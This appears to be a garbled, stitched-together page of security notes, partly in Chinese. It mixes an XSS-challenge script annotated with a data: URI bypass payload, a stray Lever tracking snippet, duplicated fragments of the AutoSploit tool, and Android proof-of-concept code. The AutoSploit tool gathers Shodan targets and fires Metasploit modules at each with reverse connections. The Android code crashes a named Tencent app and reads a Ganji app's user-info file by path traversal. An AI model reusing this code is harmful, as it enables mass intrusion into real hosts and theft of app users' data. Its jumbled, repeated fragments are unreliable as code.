<script> functionsetInnerText(element, value) { if (element.innerText) { element.innerText = value; } else { element.textContent = value; } } functionincludeGadget(url) { var scriptEl = document.createElement('script'); // This will totally prevent us from loading evil URLs! if (url.match(/^https?:\/\//)) { //通过大小写等绕过正则检测 setInnerText(document.getElementById("log"), "Sorry, cannot load a URL containing \"http\"."); return; } // Load this awesome gadget scriptEl.src = url; // Show log messages scriptEl.onload = function() { setInnerText(document.getElementById("log"), "Loaded gadget from " + url); } scriptEl.onerror = function() { setInnerText(document.getElementById("log"), "Couldn't load gadget from " + url); } document.head.appendChild(scriptEl); //<script src="data:text/javascript,alert('1')"></script> } // Take the value after # and use it as the gadget filename. functiongetGadgetName() { //获取或设置页面的标签值并进行跳转 returnwindow.location.hash.substr(1) || "/static/gadget.js"; //data:text/javascript,alert('1') } includeGadget(getGadgetName()); // Extra code so that we can communicate with the parent page window.addEventListener("message", function(event){ if (event.source == parent) { includeGadget(getGadgetName()); } }, false); </script> </head> <bodyid="level6"> <imgsrc="/static/logos/level6.png"> <imgid="cube"src="/static/level6_cube.png"> <divid="log">Loading gadget...</div> </body> </html>
//Checking for potential Lever source or origin parameters var pageUrl = window.location.href; var leverParameter = ''; var trackingPrefix = '?lever-'
if( pageUrl.indexOf(trackingPrefix) >= 0){ // Found Lever parameter var pageUrlSplit = pageUrl.split(trackingPrefix); leverParameter = '?lever-'+pageUrlSplit[1]; } var link = posting.hostedUrl+leverParameter;
if clobber == True: with open('hosts.txt', 'wb') as log: for i in xrange(toolbar_width): time.sleep(0.1) for service in result['matches']: log.write(service['ip_str']) log.write("\n")
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
if choice == 's': with open("hosts.txt", "rb") as host_list: for rhosts in host_list: for exploit in sorted_modules: template = "sudo msfconsole -x 'workspace -a %s; setg LHOST %s; setg LPORT %s; setg VERBOSE true; setg THREADS 100; set RHOSTS %s; %s'" % ( workspace, local_host, local_port, rhosts, exploit) os.system(template) elif choice == 'a': with open("hosts.txt", "rb") as host_list: for rhosts in host_list: for exploit in all_modules: template = "sudo msfconsole -x 'workspace -a %s; setg LHOST %s; setg LPORT %s; setg VERBOSE true; setg THREADS 100; set RHOSTS %s; %s'" % ( workspace, local_host, local_port, rhosts, exploit) os.system(template) else: print "[" + t.red("!") + "]Unhandled Option. Defaulting to Main Menu"
# Usage and legal. def usage(): os.system("clear") logo() print """ +-----------------------------------------------------------------------+ | AutoSploit General Usage and Information | +-----------------------------------------------------------------------+ |As the name suggests AutoSploit attempts to automate the exploitation | |of remote hosts. Targets are collected by employing the Shodan.io API. | | | |The 'Gather Hosts' option will open a dialog from which you can | |enter platform specific search queries such as 'Apache' or 'IIS'. | |Upon doing so a list of candidates will be retrieved and saved to | |hosts.txt in the current working directory. | |After this operation has been completed the 'Exploit' option will | |go about the business of attempting to exploit these targets by | |running a range of Metasploit modules against them. | | | |Workspace, local host and local port for MSF facilitated | |back connections are configured through the dialog that comes up | |before the 'Exploit' module is started. | | | +------------------+----------------------------------------------------+ | Option | Summary | +------------------+----------------------------------------------------+ |1. Usage | Display this informational message. | |2. Gather Hosts | Query Shodan for a list of platform specific IPs. | |3. View Hosts | Print gathered IPs/RHOSTS. | |4. Exploit | Configure MSF and Start exploiting gathered targets| |5. Quit | Exits AutoSploit. | +------------------+----------------------------------------------------+ | Legal Disclaimer | +-----------------------------------------------------------------------+ | Usage of AutoSploit for attacking targets without prior mutual consent| | is illegal. It is the end user's responsibility to obey all applicable| | local, state and federal laws. Developers assume no liability and are | | not responsible for any misuse or damage caused by this program! | +-----------------------------------------------------------------------+ """
# Function that allows us to store system command # output in a variable def cmdline(command): process = Popen( args=command, stdout=PIPE, shell=True ) return process.communicate()[0]
def exploit(query): global workspace global local_port global local_host
os.system("clear") logo()
sorted_modules = [] all_modules = []
print "[" + t.green("+") + "]Sorting modules relevant to the specified platform." print "[" + t.green("+") + "]This may take a while...\n\n\n"
with open("modules.txt", "rb") as infile: for i in xrange(toolbar_width): time.sleep(0.1) for lines in infile: all_modules.append(lines) if query in lines: sorted_modules.append(lines)
# update the bar sys.stdout.write('\033[94m' + "|" + '\033[0m') sys.stdout.flush()
print "\n\n\n[" + t.green("+") + "]AutoSploit sorted the following MSF modules based search query relevance.\n" # Print out the sorted modules for line in sorted_modules: print "[" + t.cyan("-") + "]" + line
# We'll give the user the option to run all modules in a 'hail mary' type of attack or allow # a more directed approach with the sorted modules. choice = raw_input("\n[" + t.magenta("?") + "]Run sorted or all modules against targets? [S]orted/[A]ll: ").lower()
if choice == 's': with open("hosts.txt", "rb") as host_list: for rhosts in host_list: for exploit in sorted_modules: template = "sudo msfconsole -x 'workspace -a %s; setg LHOST %s; setg LPORT %s; setg VERBOSE true; setg THREADS 100; set RHOSTS %s; %s'" % ( workspace, local_host, local_port, rhosts, exploit) os.system(template) elif choice == 'a': with open("hosts.txt", "rb") as host_list: for rhosts in host_list: for exploit in all_modules: template = "sudo msfconsole -x 'workspace -a %s; setg LHOST %s; setg LPORT %s; setg VERBOSE true; setg THREADS 100; set RHOSTS %s; %s'" % ( workspace, local_host, local_port, rhosts, exploit) os.system(template) else: print "[" + t.red("!") + "]Unhandled Option. Defaulting to Main Menu"
# Function to gather target hosts from Shodan def targets(clobber=True): global query
os.system("clear") logo()
print "[" + t.green("+") + "]Please provide your platform specific search query." print "[" + t.green("+") + "]I.E. 'IIS' will return a list of IPs belonging to IIS servers."
while True: query = raw_input("\n<" + t.cyan("PLATFORM") + ">$ ")
if query == "": print "[" + t.red("!") + "]Query cannot be null." else: break
print "[" + t.green("+") + "]Please stand by while results are being collected...\n\n\n" time.sleep(1)
try: result = api.search(query) except Exception as e: print "\n[" + t.red("!") + "]Critical. An error was raised with the following error message.\n" print e
if clobber == True: with open('hosts.txt', 'wb') as log: for i in xrange(toolbar_width): time.sleep(0.1) for service in result['matches']: log.write(service['ip_str']) log.write("\n")
# update the bar sys.stdout.write('\033[94m' + "|" + '\033[0m') sys.stdout.flush()
hostpath = os.path.abspath("hosts.txt")
print "\n\n\n[" + t.green("+") + "]Done." print "[" + t.green("+") + "]Host list saved to " + hostpath
else: with open("hosts.txt", "ab") as log: for i in xrange(toolbar_width): time.sleep(0.1) for service in result['matches']: log.write(service['ip_str']) log.write("\n")
# update the bar sys.stdout.write('\033[94m' + "|" + '\033[0m') sys.stdout.flush()
hostpath = os.path.abspath("hosts.txt")
print "\n\n\n[" + t.green("+") + "]Done." print "[" + t.green("+") + "]Hosts appended to list at " + hostpath
# Function to define metasploit settings def settings(): global workspace global local_port global local_host global configured
os.system("clear") logo()
print "[" + t.green("+") + "]MSF Settings\n" print "In order to proceed with the exploit module some MSF" print "settings need to be configured." time.sleep(1.5)
print "\n[" + t.green("+") + "]Note.\n" print "Please make sure your Network is configured properly.\n" print "In order to handle incoming Reverse Connections" print "your external Facing IP & Port need to be reachable..." time.sleep(1.5)
workspace = raw_input("\n[" + t.magenta("?") + "]Please set the Workspace name: ") if not workspace == "": print "[" + t.green("+") + "]Workspace set to: " + workspace else: workspace = False
local_host = raw_input("\n[" + t.magenta("?") + "]Please set the local host: ") if not local_host == "": print "[" + t.green("+") + "]Local host set to: " + repr(local_host) else: local_host = False
local_port = raw_input("\n[" + t.magenta("?") + "]Please set the local port: ") if not local_host == "": print "[" + t.green("+") + "]Local port set to: " + repr(local_port) else: local_port = False
# Check if settings are not null if workspace == False or local_host == False or local_port == False: configured = None print "\n[" + t.red("!") + "]Warning. LPORT, LHOST and/or workspace cannot be null" print "[" + t.green("+") + "]Restarting MSF Settings module." time.sleep(1.5) else: # If everything has been properly configured we're setting config var to true # When we return to the main menu loop we will use it to check to see if we # can skip the config stage. When the exploit component is run a second time configured = True
if not os.path.isfile("hosts.txt"): print "[" + t.red("!") + "]Warning. AutoSploit failed to detect host file." print "In order for the exploit module to work, a host file needs to be" print "present." else: # Call exploit function, the 'query' argument contains the search strig provided # in the 'gather hosts' function. We will check this string against the MSF # modules in order to sort out the most relevant ones with regards to the intended # targets. exploit(query)
# Main menu def main(): global query global configured global api
try: api = shodan.Shodan(SHODAN_API_KEY) except Exception as e: print "\n[" + t.red("!") + "]Critical. API setup failed.\n" print e sys.exit(0)
try: while True: # Make sure a misconfiguration in the MSF settings # Doesn't execute main menu loop but returns us to the # appropriate function for handling those settings if configured == None: settings()
with open("hosts.txt", "rb") as infile: for line in infile: print "[" + t.cyan("-") + "]" + line
print "[" + t.green("+") + "]Done.\n"
elif action == '4': if not os.path.isfile("hosts.txt"): print "\n[" + t.red("!") + "]Warning. AutoSploit failed to detect host file." print "Please make sure to gather a list of targets" print "by selecting the 'Gather Hosts' option" print "before executing the 'Exploit' module."
if configured == True: exploit(query) elif configured == False: settings()
print "[" + t.green("+") + "]Initializing AutoSploit..." print "[" + t.green("+") + "]One moment please while we check the Postgresql and Apache services...\n"
postgresql = cmdline("sudo service postgresql status | grep active") if "Active: inactive" in postgresql: print "\n[" + t.red("!") + "]Warning. Heuristics indicate Postgresql Service is offline"
start_pst = raw_input("\n[" + t.magenta("?") + "]Start Postgresql Service? [Y]es/[N]o: ").lower() if start_pst == 'y': os.system("sudo service postgresql start")
print "[" + t.green("+") + "]Postgresql Service Started..." time.sleep(1.5)
elif start_pst == 'n': print "\n[" + t.red("!") + "]AutoSploit's MSF related operations require this service to be active." print "[" + t.red("!") + "]Aborted." time.sleep(1.5) sys.exit(0) else: print "\n[" + t.red("!") + "]Unhandled Option. Defaulting to starting the service." os.system("sudo service postgresql start")
print "[" + t.green("+") + "]Postgresql Service Started..." time.sleep(1.5)
apache = cmdline("service apache2 status | grep active") if "Active: inactive" in apache: print "\n[" + t.red("!") + "]Warning. Heuristics indicate Apache Service is offline"
start_ap = raw_input("\n[" + t.magenta("?") + "]Start Apache Service? [Y]es/[N]o: ").lower() if start_ap == 'y': os.system("sudo service apache2 start")
print "[" + t.green("+") + "]Apache2 Service Started..." time.sleep(1.5)
elif start_ap == 'n': print "\n[" + t.red("!") + "]AutoSploit's MSF related operations require this service to be active." print "[" + t.red("!") + "]Aborted." time.sleep(1.5) sys.exit(0) else: print "\n[" + t.red("!") + "]Unhandled Option. Defaulting to starting the service." os.system("sudo service apache2 start")
print "[" + t.green("+") + "]Apache2 Service Started..." time.sleep(1.5)
# We will check if the shodan api key has been saved before, if not we are going to prompt # for it and save it to a file if not os.path.isfile("api.p"): print "\n[" + t.green("+") + "]Please provide your Shodan.io API key."
path = os.path.abspath("api.p") print "[" + t.green("+") + "]\nYour API key has been saved to " + path
main() else: try: SHODAN_API_KEY = pickle.load(open("api.p", "rb")) except IOError as e: print "\n[" + t.red("!") + "]Critical. An IO error was raised while attempting to read API data." print e
path = os.path.abspath("api.p") print "\n[" + t.green("+") + "]Your API key was loaded from " + path
e.g. 某手机管家com.tencent.qqpimsecure.service.InOutCallReceiver广播组件没有对消息进行校验,传入空消息导致NullPointerException异常
1 2 3 4
Intent i = new Intent(); ComponentName componetName = new ComponentName( "com.tencent.qqpimsecure", "com.tencent.qqpimsecure.service.InOutCallReceiver"); i.setComponent(componetName); sendBroadcast(i);
public void GJContentProviderFileOperations(){ try{ InputStream in = getContentResolver().openInputStream(Uri.parse("content://com.ganji.html5.localfile.1/webview/../../shared_prefs/userinfo.xml")); ByteArrayOutputStream out = new ByteArrayOutputStream(); byte[] buffer = new byte[1024]; int n = in.read(buffer); while(n>0){ out.write(buffer, 0, n); n = in.read(buffer); Toast.makeText(getBaseContext(), out.toString(), Toast.LENGTH_LONG).show(); } }catch(Exception e){ debugInfo(e.getMessage()); } }